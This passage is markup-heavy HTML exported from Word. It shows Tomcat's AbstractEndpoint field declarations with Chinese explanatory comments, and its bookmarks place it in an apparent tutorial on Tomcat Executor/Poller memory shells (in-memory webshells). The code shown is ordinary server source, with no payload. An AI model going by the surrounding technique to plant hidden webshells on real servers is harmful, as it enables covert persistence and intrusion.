</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">...</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">abstract</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">class</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> AbstractEndpoint</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">S</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">U</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* Endpoint的运行状态 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">volatile</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">boolean</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> running </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">false</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* Endpoint暂停时设置为true */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">volatile</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">boolean</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> paused </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">false</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 标记使用的是否为默认线程池 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">volatile</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">boolean</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> internalExecutor </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">true</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 流量控制阀门，Socket连接数限制，达到阈值之后放入FIFO队列 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">volatile</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> LimitLatch connectionLimitLatch </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 代表在Server.xml中可设置的一些Socket相关属性 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">final</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> SocketProperties socketProperties </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim 